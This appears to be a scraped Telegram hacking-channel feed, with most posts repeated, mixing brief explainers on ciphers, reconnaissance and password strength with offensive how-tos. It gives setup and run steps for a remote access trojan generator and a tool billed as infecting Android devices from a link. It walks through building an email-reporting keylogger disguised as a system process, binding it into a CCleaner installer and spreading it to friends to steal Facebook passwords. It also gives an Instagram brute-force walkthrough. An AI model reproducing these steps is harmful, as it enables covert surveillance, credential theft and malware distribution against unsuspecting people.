☢☢How to install A-Rat tool☢☢
A-Rat = Remote access tool
☣we can generate python based rat
installation :
$ apt update
$ apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/Xi4u7/A-Rat
$ cd A-Rat
$ chmod +x *
usage :
$ python2 A-Rat.py
$ help
$ set host 127.0.0.1 [your ip]
$ set port 1337
$ set output /$HOME/rat.py
$ generate
☣It generates rat.py in termux home directory
Open termux new session
type $ ls
here you get that rat.py
go to again A-Rat means privious session of termux
Type run to start exploit.
$ run
and then open new session and run rat like this
$ python rat.py
and come back to A-Rat session
Now its connected to that rat. means Hacked.
press control + c to stop.
⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⛔⛔🚫⛔🚫🚫⛔Any thing happen in your own risk
A-Rat = Remote access tool
☣we can generate python based rat
installation :
$ apt update
$ apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/Xi4u7/A-Rat
$ cd A-Rat
$ chmod +x *
usage :
$ python2 A-Rat.py
$ help
$ set host 127.0.0.1 [your ip]
$ set port 1337
$ set output /$HOME/rat.py
$ generate
☣It generates rat.py in termux home directory
Open termux new session
type $ ls
here you get that rat.py
go to again A-Rat means privious session of termux
Type run to start exploit.
$ run
and then open new session and run rat like this
$ python rat.py
and come back to A-Rat session
Now its connected to that rat. means Hacked.
press control + c to stop.
⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⛔⛔🚫⛔🚫🚫⛔Any thing happen in your own risk
🔰What is Cryptography?🔰
🌀Cryptography is the study and application of techniques that hide the real meaning of information by transforming it into nonhuman readable formats and vice versa.
🌀Let’s illustrate this with the aid of an example. Suppose you want to send the message “I LOVE APPLES”, you can replace every letter in the phrase with the third successive letter in the alphabet. The encrypted message will be “K NQXG CRRNGV”. To decrypt our message, we will have to go back three letters in the alphabet using the letter that we want to decrypt. The image below shows how the transformation is done.
🌀The process of transforming information into nonhuman readable form is called encryption.
🌀The process of reversing encryption is called decryption.
🌀Decryption is done using a secret key which is only known to the legitimate recipients of the information. The key is used to decrypt the hidden messages. This makes the communication secure because even if the attacker manages to get the information, it will not make sense to them.
🌀The encrypted information is known as a cipher.
✨ Credit : Hacking
Share and Support ❤️
➖ @Wifihackerking ➖
🌀Cryptography is the study and application of techniques that hide the real meaning of information by transforming it into nonhuman readable formats and vice versa.
🌀Let’s illustrate this with the aid of an example. Suppose you want to send the message “I LOVE APPLES”, you can replace every letter in the phrase with the third successive letter in the alphabet. The encrypted message will be “K NQXG CRRNGV”. To decrypt our message, we will have to go back three letters in the alphabet using the letter that we want to decrypt. The image below shows how the transformation is done.
🌀The process of transforming information into nonhuman readable form is called encryption.
🌀The process of reversing encryption is called decryption.
🌀Decryption is done using a secret key which is only known to the legitimate recipients of the information. The key is used to decrypt the hidden messages. This makes the communication secure because even if the attacker manages to get the information, it will not make sense to them.
🌀The encrypted information is known as a cipher.
✨ Credit : Hacking
Share and Support ❤️
➖ @Wifihackerking ➖
🔰Reconnaissance🔰
🌀Information Gathering and getting to know the target systems is the first process in ethical hacking. Reconnaissance is a set of processes and techniques (Footprinting, Scanning & Enumeration) used to covertly discover and collect information about a target system.
🌀During reconnaissance, an ethical hacker attempts to gather as much information about a target system as possible, following the seven steps listed below −
▫️Gather initial information
▫️Determine the network range
▫️Identify active machines
▫️Discover open ports & access points
▫️Fingerprint the operating system
▫️Uncover services on ports
▫️Map the network
🌀We will discuss in detail all these steps in the subsequent chapters of this tutorial. Reconnaissance takes place in two parts − Active Reconnaissance and Passive Reconnaissance.
🌀Active Reconnaissance
In this process, you will directly interact with the computer system to gain information. This information can be relevant and accurate. But there is a risk of getting detected if you are planning active reconnaissance without permission. If you are detected, then system admin can take severe action against you and trail your subsequent activities.
🌀Passive Reconnaissance
In this process, you will not be directly connected to a computer system. This process is used to gather essential information without ever interacting with the target systems
Credit : Hacking
Share and Support ❤️
➖ @wifihackerking➖
🌀Information Gathering and getting to know the target systems is the first process in ethical hacking. Reconnaissance is a set of processes and techniques (Footprinting, Scanning & Enumeration) used to covertly discover and collect information about a target system.
🌀During reconnaissance, an ethical hacker attempts to gather as much information about a target system as possible, following the seven steps listed below −
▫️Gather initial information
▫️Determine the network range
▫️Identify active machines
▫️Discover open ports & access points
▫️Fingerprint the operating system
▫️Uncover services on ports
▫️Map the network
🌀We will discuss in detail all these steps in the subsequent chapters of this tutorial. Reconnaissance takes place in two parts − Active Reconnaissance and Passive Reconnaissance.
🌀Active Reconnaissance
In this process, you will directly interact with the computer system to gain information. This information can be relevant and accurate. But there is a risk of getting detected if you are planning active reconnaissance without permission. If you are detected, then system admin can take severe action against you and trail your subsequent activities.
🌀Passive Reconnaissance
In this process, you will not be directly connected to a computer system. This process is used to gather essential information without ever interacting with the target systems
Credit : Hacking
Share and Support ❤️
➖ @wifihackerking➖
🔰What is password strength?🔰
🌀Password strength is the measure of a password’s efficiency to resist password cracking attacks. The strength of a password is determined by;
▫️Length: the number of characters the password contains.
▫️Complexity: does it use a combination of letters, numbers, and symbol?
▫️Unpredictability: is it something that can be guessed easily by an attacker?
Share and Support ❤️
➖@wifihackerking ➖
🌀Password strength is the measure of a password’s efficiency to resist password cracking attacks. The strength of a password is determined by;
▫️Length: the number of characters the password contains.
▫️Complexity: does it use a combination of letters, numbers, and symbol?
▫️Unpredictability: is it something that can be guessed easily by an attacker?
Share and Support ❤️
➖@wifihackerking ➖
?? Infect is available for:
Termux
?? Installation and usage guide:
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/Infect
$ ls
$ cd infect
$ ls
$ bash infect.sh
Now you need internet connection to continue further process...
You can select any option by clicking on your keyboard
Note:- Don't delete any of the scripts included in lol file
Termux
?? Installation and usage guide:
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/Infect
$ ls
$ cd infect
$ ls
$ bash infect.sh
Now you need internet connection to continue further process...
You can select any option by clicking on your keyboard
Note:- Don't delete any of the scripts included in lol file
GitHub
GitHub - noob-hackers/infect: Infect Any Android Device With Virus From Link In Termux
Infect Any Android Device With Virus From Link In Termux - noob-hackers/infect
Before you hack you need to learn hacking i is not simple so learn before @The_unknown_hat👇
🔰The Complete Ethical Hacking Course.🔰
🔺Are you a beginner? And wanted to become a penetration tester?, But don't know from where to start?..... Don't worry this course is going to help you. Learn ethical hacking from beginner to advanced.🔻
🔗Link : https://mega.nz/folder/CPxUiAAS#GVXzHzu_kUyfpHM1jMPPIQ
➖@Wifihackerking _X➖
🔺Are you a beginner? And wanted to become a penetration tester?, But don't know from where to start?..... Don't worry this course is going to help you. Learn ethical hacking from beginner to advanced.🔻
🔗Link : https://mega.nz/folder/CPxUiAAS#GVXzHzu_kUyfpHM1jMPPIQ
➖@Wifihackerking _X➖
mega.nz
File folder on MEGA
🔰 HOW TO INCREASE VIRTUAL RAM OF YOUR PC 🔰
1) Hᴏʟᴅ ᴅᴏᴡɴ ᴛʜᴇ 'Wɪɴᴅᴏᴡꜱ' Kᴇʏ
2) Pʀᴇꜱꜱ ᴛʜᴇ 'Pᴀᴜꜱᴇ/Bʀᴇᴀᴋ' Bᴜᴛᴛᴏɴ ᴀᴛ ᴛʜᴇ ᴛᴏᴘ ʀɪɢʜᴛ ᴏғ Yᴏᴜʀ Kᴇʏʙᴏᴀʀᴅ.
3) Cʟɪᴄᴋ ᴏɴ ᴛʜᴇ 'Aᴅᴠᴀɴᴄᴇᴅ' ᴛᴀʙ.
4) Uɴᴅᴇʀ 'Pᴇʀғᴏʀᴍᴀɴᴄᴇ', ᴄʟɪᴄᴋ 'Sᴇᴛᴛɪɴɢꜱ'.
5) Tʜᴇɴ ᴄʟɪᴄᴋ ᴛʜᴇ 'Aᴅᴠᴀɴᴄᴇᴅ' ᴛᴀʙ ᴏɴ ᴛʜᴇ ʙᴜᴛᴛᴏɴ ᴛʜᴀᴛ ᴘᴏᴘꜱ ᴜᴘ.
6) Uɴᴅᴇʀ 'Vɪʀᴛᴜᴀʟ Mᴇᴍᴏʀʏ' ᴀᴛ ᴛʜᴇ ʙᴏᴛᴛᴏᴍ, ᴄʟɪᴄᴋ 'Cʜᴀɴɢᴇ'.
7) Cʟɪᴄᴋ ᴛʜᴇ 'Cᴜꜱᴛᴏᴍ Sɪᴢᴇ' ʙᴜᴛᴛᴏɴ.
8) Fᴏʀ ᴛʜᴇ ɪɴɪᴛɪᴀʟ ꜱɪᴢᴇ (ᴅᴇᴘᴇɴᴅɪɴɢ ᴏɴ ʏᴏᴜʀ HD ꜱᴘᴀᴄᴇ), ᴛʏᴘᴇ ɪɴ ᴀɴʏᴡʜᴇʀᴇ ғʀᴏᴍ 1000-1500 (ᴀʟᴛʜᴏᴜɢʜ I ᴜꜱᴇ 4000), ᴀɴᴅ ғᴏʀ ᴛʜᴇ Mᴀxɪᴍᴜᴍ ꜱɪᴢᴇ ᴛʏᴘᴇ ɪɴ ᴀɴʏᴡʜᴇʀᴇ ғʀᴏᴍ 2000-2500 (ᴀʟᴛʜᴏᴜɢʜ I ᴜꜱᴇ 6000).
9) Cʟɪᴄᴋ 'Sᴇᴛ', ᴀɴᴅ ᴛʜᴇɴ ᴇxɪᴛ ᴏᴜᴛ ᴏғ ᴀʟʟ ᴏғ ᴛʜᴇ ᴡɪɴᴅᴏᴡꜱ.
10) Fɪɴᴀʟʟʏ, Rᴇꜱᴛᴀʀᴛ ʏᴏᴜʀ ᴄᴏᴍᴘᴜᴛᴇʀ.
11) Yᴏᴜ ɴᴏᴡ ʜᴀᴠᴇ ᴀ ғᴀꜱᴛᴇʀ ᴄᴏᴍᴘᴜᴛᴇʀ ᴀɴᴅ 1-2GB ᴏғ Vɪʀᴛᴜᴀʟ RAM.
☄️ Tʜɪꜱ ɪꜱ Uꜱᴇᴅ Tᴏ Iɴᴄʀᴇᴀꜱᴇ Sᴘᴇᴇᴅ Oғ Yᴏᴜ PC
1) Hᴏʟᴅ ᴅᴏᴡɴ ᴛʜᴇ 'Wɪɴᴅᴏᴡꜱ' Kᴇʏ
2) Pʀᴇꜱꜱ ᴛʜᴇ 'Pᴀᴜꜱᴇ/Bʀᴇᴀᴋ' Bᴜᴛᴛᴏɴ ᴀᴛ ᴛʜᴇ ᴛᴏᴘ ʀɪɢʜᴛ ᴏғ Yᴏᴜʀ Kᴇʏʙᴏᴀʀᴅ.
3) Cʟɪᴄᴋ ᴏɴ ᴛʜᴇ 'Aᴅᴠᴀɴᴄᴇᴅ' ᴛᴀʙ.
4) Uɴᴅᴇʀ 'Pᴇʀғᴏʀᴍᴀɴᴄᴇ', ᴄʟɪᴄᴋ 'Sᴇᴛᴛɪɴɢꜱ'.
5) Tʜᴇɴ ᴄʟɪᴄᴋ ᴛʜᴇ 'Aᴅᴠᴀɴᴄᴇᴅ' ᴛᴀʙ ᴏɴ ᴛʜᴇ ʙᴜᴛᴛᴏɴ ᴛʜᴀᴛ ᴘᴏᴘꜱ ᴜᴘ.
6) Uɴᴅᴇʀ 'Vɪʀᴛᴜᴀʟ Mᴇᴍᴏʀʏ' ᴀᴛ ᴛʜᴇ ʙᴏᴛᴛᴏᴍ, ᴄʟɪᴄᴋ 'Cʜᴀɴɢᴇ'.
7) Cʟɪᴄᴋ ᴛʜᴇ 'Cᴜꜱᴛᴏᴍ Sɪᴢᴇ' ʙᴜᴛᴛᴏɴ.
8) Fᴏʀ ᴛʜᴇ ɪɴɪᴛɪᴀʟ ꜱɪᴢᴇ (ᴅᴇᴘᴇɴᴅɪɴɢ ᴏɴ ʏᴏᴜʀ HD ꜱᴘᴀᴄᴇ), ᴛʏᴘᴇ ɪɴ ᴀɴʏᴡʜᴇʀᴇ ғʀᴏᴍ 1000-1500 (ᴀʟᴛʜᴏᴜɢʜ I ᴜꜱᴇ 4000), ᴀɴᴅ ғᴏʀ ᴛʜᴇ Mᴀxɪᴍᴜᴍ ꜱɪᴢᴇ ᴛʏᴘᴇ ɪɴ ᴀɴʏᴡʜᴇʀᴇ ғʀᴏᴍ 2000-2500 (ᴀʟᴛʜᴏᴜɢʜ I ᴜꜱᴇ 6000).
9) Cʟɪᴄᴋ 'Sᴇᴛ', ᴀɴᴅ ᴛʜᴇɴ ᴇxɪᴛ ᴏᴜᴛ ᴏғ ᴀʟʟ ᴏғ ᴛʜᴇ ᴡɪɴᴅᴏᴡꜱ.
10) Fɪɴᴀʟʟʏ, Rᴇꜱᴛᴀʀᴛ ʏᴏᴜʀ ᴄᴏᴍᴘᴜᴛᴇʀ.
11) Yᴏᴜ ɴᴏᴡ ʜᴀᴠᴇ ᴀ ғᴀꜱᴛᴇʀ ᴄᴏᴍᴘᴜᴛᴇʀ ᴀɴᴅ 1-2GB ᴏғ Vɪʀᴛᴜᴀʟ RAM.
☄️ Tʜɪꜱ ɪꜱ Uꜱᴇᴅ Tᴏ Iɴᴄʀᴇᴀꜱᴇ Sᴘᴇᴇᴅ Oғ Yᴏᴜ PC
🔥 HOW HACK FACEBOOK ACCOUNTS USING KEYLOGGER 🔥😱
🚫 warning don't hack any one because you will land on jail 🚫
@The_unknown_hat
STEP 1: Create Server for Hacking Passwords
First of all, for hacking any Facebook account password, we have to create our keylogger server that will run on the victim’s machine, capturing his keystrokes and emailing us the record. The keylogger server building process consists of several steps:
1. First of all download the Keylogger and a good binder. Binders are easily available via a Google search.
2. Extract the RAR file. Now you will get one folder and three files.
3. Open the Keylogger file. Here you will need a gmail ID and password. For safer use, create a fake Gmail account.
4. Click on server settings as shown. Here, enter the time at which you want to receive reports; it’s always preferable to use a 20 minute timer for receiving files. Click on the Output box to choose the location of the file and give it a name. We recommend using a system process name to make it undetectable, like svchost, or check any process name from your task manager and name it. Other fields are optional.
5. Click on Log and Result Setting. In Log Email Title enter the subject of email like “my keylogger report” or anything else that you you like. Click the last two options that add computer name and add the victim’s name.
6. Now click on “Other Options.” In this section you just have to do one thing. Most hackers prefer warning message POP up, but I prefer keylogger using any message – so unclick the message button. When you bind it with any other software it should not have a warning message attached, otherwise it will be detectable.
7. Finally click on Build Keylogger. You will see your keylogger file at the location that you have chosen in the 4th step. This keylogger server file will be used to bind with other software in Binding Step.
8. Now your keylogger server is ready for you to hack Facebook accounts.
Step 2: Extracting the icon file from any installer (resource hacker)
1. Open the resource hacker folder and select the reshacker file.
2. Go to its menu and open any setup file. Suppose we want to attach our keylogger to a Ccleaner setup file. Open the Ccleaner setup with resource hacker.
3. In the menu, there is one action button. Click on it and then click save all resource.
4. Save all the resources to the desktop or any other location of your choice.
5. It consists of two files. One is icon file and other is res file. We only need the icon file, so you can delete the other one.
6. That leaves us with the icon of installer file (Ccleaner setup icon).
Step 3: Bind the Keylogger server with any software
1. Go to keylogger folder and open the Binder.
2. Click on the button shown below to add files.
3. Add the keylogger server and the setup software (in our case it’s Ccleaner setup).
4. In the Binder menu, go to Settings. There, select the icon that we have generated in the previous step and set the location of the output file as shown in the figure.
5. Now again go to file’s menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. You just need to spread it or send it to the victim that is your friend.
Step 4: How to spread the keylogger
1. Now you have one software setup file with a keylogger attached to it. (In our case, we have Ccleaner setup with keylogger attached with it)
2. Spread your keylogger through forums. If you are a member of various forums, use them to spread your keylogger in the form of software posts.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software, give them the software with the keylogger attached to it on the hard drive.
Note: you can also attach keyloggers to images, but that can be detectable by antivirus, so we recommend avoiding that route.
Hacking someone’s Facebook account takes more than a few minutes.
Share and Pin our Channel at top 👍❤️
🚫 warning don't hack any one because you will land on jail 🚫
@The_unknown_hat
STEP 1: Create Server for Hacking Passwords
First of all, for hacking any Facebook account password, we have to create our keylogger server that will run on the victim’s machine, capturing his keystrokes and emailing us the record. The keylogger server building process consists of several steps:
1. First of all download the Keylogger and a good binder. Binders are easily available via a Google search.
2. Extract the RAR file. Now you will get one folder and three files.
3. Open the Keylogger file. Here you will need a gmail ID and password. For safer use, create a fake Gmail account.
4. Click on server settings as shown. Here, enter the time at which you want to receive reports; it’s always preferable to use a 20 minute timer for receiving files. Click on the Output box to choose the location of the file and give it a name. We recommend using a system process name to make it undetectable, like svchost, or check any process name from your task manager and name it. Other fields are optional.
5. Click on Log and Result Setting. In Log Email Title enter the subject of email like “my keylogger report” or anything else that you you like. Click the last two options that add computer name and add the victim’s name.
6. Now click on “Other Options.” In this section you just have to do one thing. Most hackers prefer warning message POP up, but I prefer keylogger using any message – so unclick the message button. When you bind it with any other software it should not have a warning message attached, otherwise it will be detectable.
7. Finally click on Build Keylogger. You will see your keylogger file at the location that you have chosen in the 4th step. This keylogger server file will be used to bind with other software in Binding Step.
8. Now your keylogger server is ready for you to hack Facebook accounts.
Step 2: Extracting the icon file from any installer (resource hacker)
1. Open the resource hacker folder and select the reshacker file.
2. Go to its menu and open any setup file. Suppose we want to attach our keylogger to a Ccleaner setup file. Open the Ccleaner setup with resource hacker.
3. In the menu, there is one action button. Click on it and then click save all resource.
4. Save all the resources to the desktop or any other location of your choice.
5. It consists of two files. One is icon file and other is res file. We only need the icon file, so you can delete the other one.
6. That leaves us with the icon of installer file (Ccleaner setup icon).
Step 3: Bind the Keylogger server with any software
1. Go to keylogger folder and open the Binder.
2. Click on the button shown below to add files.
3. Add the keylogger server and the setup software (in our case it’s Ccleaner setup).
4. In the Binder menu, go to Settings. There, select the icon that we have generated in the previous step and set the location of the output file as shown in the figure.
5. Now again go to file’s menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. You just need to spread it or send it to the victim that is your friend.
Step 4: How to spread the keylogger
1. Now you have one software setup file with a keylogger attached to it. (In our case, we have Ccleaner setup with keylogger attached with it)
2. Spread your keylogger through forums. If you are a member of various forums, use them to spread your keylogger in the form of software posts.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software, give them the software with the keylogger attached to it on the hard drive.
Note: you can also attach keyloggers to images, but that can be detectable by antivirus, so we recommend avoiding that route.
Hacking someone’s Facebook account takes more than a few minutes.
Share and Pin our Channel at top 👍❤️
🔰"ᴄʀᴀᴄᴋɪɴɢ ᴜsɪɴɢ ʙʀᴜᴛᴇ ғᴏʀᴄᴇ (ᴏʀ ᴅɪᴄᴛɪᴏɴᴀʀʏ ᴀᴛᴛᴀᴄᴋ) ᴛᴀᴋᴇs ᴀ ʟᴏɴɢ ᴛɪᴍᴇ ᴀɴᴅ ᴏɴʟʏ ᴡᴏʀᴋs ᴡɪᴛʜ sɪᴍᴘʟᴇ ᴘᴀssᴡᴏʀᴅs. ɪᴛ ɪs ᴍᴜᴄʜ ʙᴇᴛᴛᴇʀ ᴛᴏ ᴄᴀʀʀʏ ᴏᴜᴛ ᴏᴛʜᴇʀ ᴍᴇᴛʜᴏᴅs sᴜᴄʜ ᴀs ᴘʜɪsɪɴɢ ʙᴇғᴏʀᴇ sᴜᴄᴄᴜᴍʙɪɴɢ ᴛᴏ ʙʀᴜᴛᴇ ғᴏʀᴄᴇ."
✅ ᴡʜᴀᴛ ʏᴏᴜ ᴡɪʟʟ ɴᴇᴇᴅ
♻️- ᴀɴ ᴏʙᴊᴇᴄᴛɪᴠᴇ ᴀᴄᴄᴏᴜɴᴛ ᴛᴏ ᴀᴛᴛᴀᴄᴋ
♻️- ᴀ ᴄᴏᴍᴘᴜᴛᴇʀ ᴡɪᴛʜ ᴛʜᴇ "ᴋᴀʟɪ ʟɪɴᴜx" ᴏᴘᴇʀᴀᴛɪɴɢ sʏsᴛᴇᴍ (ᴏʀ ᴀɴʏ ᴏᴛʜᴇʀ ᴅᴇʙɪᴀɴ ᴅɪsᴛʀɪʙᴜᴛɪᴏɴ).
🚸- ᴅᴇᴄᴇɴᴛ ɪɴᴛᴇʀɴᴇᴛ ᴄᴏɴɴᴇᴄᴛɪᴏɴ
♻️ɪғ ʏᴏᴜ ᴅᴇᴄɪᴅᴇ ᴛᴏ ᴜɴʙʟᴏᴄᴋ ᴛʜᴇ ᴄᴏɴᴛᴇɴᴛ ʏᴏᴜ ᴜɴᴅᴇʀsᴛᴀɴᴅ ᴘᴇʀғᴇᴄᴛʟʏ ᴛʜᴀᴛ ɪ ᴅᴏ ɴᴏᴛ ᴛᴀᴋᴇ ᴄʜᴀʀɢᴇ ᴏғ ᴛʜᴇ ᴜsᴇ ʏᴏᴜ ɢɪᴠᴇ ᴛᴏ ᴛʜᴇ ᴄᴏɴᴛᴇɴᴛ ᴏғ ᴛʜɪs ᴘᴏsᴛ ᴀɴᴅ ɪ ᴡɪʟʟ ɴᴏᴛ ʙᴇ ʀᴇsᴘᴏɴsɪʙʟᴇ ғᴏʀ ʏᴏᴜʀ ᴀᴄᴛɪᴏɴs ᴏɴᴄᴇ ʏᴏᴜ ʜᴀᴠᴇ ᴜɴʟᴏᴄᴋᴇᴅ ᴛʜᴇ ᴄᴏɴᴛᴇɴᴛ. ᴛʜᴀɴᴋs ^^
🔰1- sᴛᴀʀᴛ "ᴋᴀʟɪ ʟɪɴᴜx" ᴀɴᴅ ɢᴏ ᴛᴏ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ. ᴛʜᴇɴ, ᴛʏᴘᴇ ᴛʜᴇ ɴᴇxᴛ:
> sᴜᴅᴏ sᴜ
ᴀɴᴅ ᴘᴜᴛ ᴛʜᴇ ᴀᴅᴍɪɴ ᴘᴀssᴡᴏʀᴅ ᴛᴏ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ ɪɴ ʀᴏᴏᴛ ᴍᴏᴅᴇ.
🔰2- ɴᴏᴡ ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ᴄʟᴏɴᴇ ᴛʜᴇ ᴛᴏᴏʟs ᴛʜᴀᴛ ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ᴜsᴇ. ᴛʏᴘᴇ:
> ᴄᴅ [ᴛʜᴇ ᴘᴀᴛʜ ᴡʜᴇʀᴇ ʏᴏᴜ ᴡᴀɴᴛ ᴛᴏ ᴅᴏ ᴛʜᴀᴛ]
> ɢɪᴛ ᴄʟᴏɴᴇ ʜᴛᴛᴘs: //ɢɪᴛʜᴜʙ. ᴄᴏᴍ/ᴇᴛʜɪᴄᴀʟ-ʜ4ᴄᴋ3ʀ/ɪɴsᴛᴀɢʀᴀᴍ (ᴅᴇʟᴇᴛᴇ ᴛʜᴇ sᴘᴀᴄᴇs)
> ᴄᴅ ɪɴsᴛᴀɢʀᴀᴍ
🔰3- ᴅᴏ ᴀ ʟs. ʏᴏᴜ ᴡɪʟʟ sᴇᴇ 3 ғɪʟᴇs/ᴅɪʀᴇᴄᴛᴏʀɪᴇs: "ᴄᴏʀᴇ", "ɪɴsᴛᴀɢʀᴀᴍ.ᴘʏ" ᴀɴᴅ ᴀɴᴏᴛʜᴇʀ ғɪʟᴇ. ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ɢɪᴠᴇ ᴘᴇʀᴍɪssɪᴏɴs ᴛᴏ ᴛʜᴇ ᴛᴏᴏʟ. ᴛʏᴘᴇ ɪɴ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ:
> ᴄʜᴍᴏᴅ +x ɪɴsᴛᴀɢʀᴀᴍ.ᴘʏ
🔰4- ɴᴏᴡ ᴡᴇ ɴᴇᴇᴅ ᴛᴏ ᴄʀᴇᴀᴛᴇ ᴀ ᴡᴏʀᴅʟɪsᴛ ғᴏʀ ᴘᴀssᴡᴏʀᴅs. ɪ ᴡɪʟʟ ɴᴏᴛ ᴇxᴘʟᴀɪɴ ʜᴏᴡ ᴛᴏ ᴅᴏ ᴛʜɪs ʙᴇᴄᴀᴜsᴇ ɪᴛ ɪs ᴄᴏᴍᴍᴏɴ sᴇɴsᴇ, ʙᴜᴛ ɪғ ʏᴏᴜ ʜᴀᴠᴇ ɴᴏ ɪᴅᴇᴀ ᴡʜᴇʀᴇ ᴛᴏ sᴛᴀʀᴛ ʏᴏᴜ ᴄᴀɴ ᴅᴏᴡɴʟᴏᴀᴅ ᴛᴏᴏʟs sᴜᴄʜ ᴀs "ᴄʀᴜɴᴄʜ" ᴏʀ "ᴄᴜᴘᴘ", ɪɴsᴛᴀʟʟ ᴛʜᴇᴍ ᴀɴᴅ ᴍᴀᴋᴇ ᴀ ᴍᴀɴ ᴏғ ᴛʜᴇsᴇ ᴘʀᴏɢʀᴀᴍs ᴛᴏ ʟᴇᴀʀɴ ʜᴏᴡ ᴛᴏ ᴜsᴇ ᴛʜᴇᴍ. ᴏɴᴄᴇ ᴡᴇ ʜᴀᴠᴇ ᴀ ғɪʟᴇ ᴡɪᴛʜ ᴛʜᴇ ʟɪsᴛ ᴏғ ᴘᴏssɪʙʟᴇ ᴘᴀssᴡᴏʀᴅs, ᴡᴇ ᴍᴏᴠᴇ ᴏɴ ᴛᴏ ᴛʜᴇ ɴᴇxᴛ sᴛᴇᴘ.
🔰5- ɴᴏᴡ, ᴡʜᴇɴ ᴡᴇ ʜᴀᴠᴇ ᴛʜᴇ ᴡᴏʀᴅʟɪsᴛ, ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴛᴏᴏʟ ᴡɪᴛʜ ᴛʜᴇ ɴᴇxᴛ sʏɴᴛᴀx:
> ᴘʏᴛʜᴏɴ ɪɴsᴛᴀɢʀᴀᴍ.ᴘʏ [ᴜsᴇʀɴᴀᴍᴇ] [ᴘᴀᴛʜ ᴛᴏ ᴛʜᴇ ᴡᴏʀᴅʟɪsᴛ]
(ʀᴇᴍᴇᴍʙᴇʀ ᴛᴏ ᴅᴇʟᴇᴛᴇ ᴛʜᴇ ][ ᴡʜᴇɴ ʏᴏᴜ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴄᴏᴍᴍᴀɴᴅ)
🔰6- ᴡᴀɪᴛ ᴜɴᴛɪʟ ᴛʜᴇ ᴘʀᴏᴄᴇss ɪs ғɪɴɪsʜᴇᴅ. ᴛʜᴇ ᴘʀᴏɢʀᴀᴍ ʙʏ ɪᴛsᴇʟғ ᴡɪʟʟ ʙᴇ ᴄʜᴇᴄᴋɪɴɢ ᴛʜᴇ ᴅɪғғᴇʀᴇɴᴛ ᴄᴏᴍʙᴏs ᴀɴᴅ ᴡɪʟʟ ᴀssɪɢɴ ᴀ ᴘʀᴏxʏ ᴀᴜᴛᴏᴍᴀᴛɪᴄᴀʟʟʏ.
🔰7- ɪғ ᴛʜᴇ ᴘʀᴏɢʀᴀᴍ ғɪɴᴅs ᴛʜᴇ ᴘᴀssᴡᴏʀᴅ, ɪᴛ ᴡɪʟʟ ɴᴏᴛɪғʏ ʏᴏᴜ ᴀɴᴅ sʜᴏᴡ ʏᴏᴜ ɪᴛs ᴄᴏʀʀᴇsᴘᴏɴᴅɪɴɢ ᴘᴀssᴡᴏʀᴅ.
✅ ᴡʜᴀᴛ ʏᴏᴜ ᴡɪʟʟ ɴᴇᴇᴅ
♻️- ᴀɴ ᴏʙᴊᴇᴄᴛɪᴠᴇ ᴀᴄᴄᴏᴜɴᴛ ᴛᴏ ᴀᴛᴛᴀᴄᴋ
♻️- ᴀ ᴄᴏᴍᴘᴜᴛᴇʀ ᴡɪᴛʜ ᴛʜᴇ "ᴋᴀʟɪ ʟɪɴᴜx" ᴏᴘᴇʀᴀᴛɪɴɢ sʏsᴛᴇᴍ (ᴏʀ ᴀɴʏ ᴏᴛʜᴇʀ ᴅᴇʙɪᴀɴ ᴅɪsᴛʀɪʙᴜᴛɪᴏɴ).
🚸- ᴅᴇᴄᴇɴᴛ ɪɴᴛᴇʀɴᴇᴛ ᴄᴏɴɴᴇᴄᴛɪᴏɴ
♻️ɪғ ʏᴏᴜ ᴅᴇᴄɪᴅᴇ ᴛᴏ ᴜɴʙʟᴏᴄᴋ ᴛʜᴇ ᴄᴏɴᴛᴇɴᴛ ʏᴏᴜ ᴜɴᴅᴇʀsᴛᴀɴᴅ ᴘᴇʀғᴇᴄᴛʟʏ ᴛʜᴀᴛ ɪ ᴅᴏ ɴᴏᴛ ᴛᴀᴋᴇ ᴄʜᴀʀɢᴇ ᴏғ ᴛʜᴇ ᴜsᴇ ʏᴏᴜ ɢɪᴠᴇ ᴛᴏ ᴛʜᴇ ᴄᴏɴᴛᴇɴᴛ ᴏғ ᴛʜɪs ᴘᴏsᴛ ᴀɴᴅ ɪ ᴡɪʟʟ ɴᴏᴛ ʙᴇ ʀᴇsᴘᴏɴsɪʙʟᴇ ғᴏʀ ʏᴏᴜʀ ᴀᴄᴛɪᴏɴs ᴏɴᴄᴇ ʏᴏᴜ ʜᴀᴠᴇ ᴜɴʟᴏᴄᴋᴇᴅ ᴛʜᴇ ᴄᴏɴᴛᴇɴᴛ. ᴛʜᴀɴᴋs ^^
🔰1- sᴛᴀʀᴛ "ᴋᴀʟɪ ʟɪɴᴜx" ᴀɴᴅ ɢᴏ ᴛᴏ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ. ᴛʜᴇɴ, ᴛʏᴘᴇ ᴛʜᴇ ɴᴇxᴛ:
> sᴜᴅᴏ sᴜ
ᴀɴᴅ ᴘᴜᴛ ᴛʜᴇ ᴀᴅᴍɪɴ ᴘᴀssᴡᴏʀᴅ ᴛᴏ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ ɪɴ ʀᴏᴏᴛ ᴍᴏᴅᴇ.
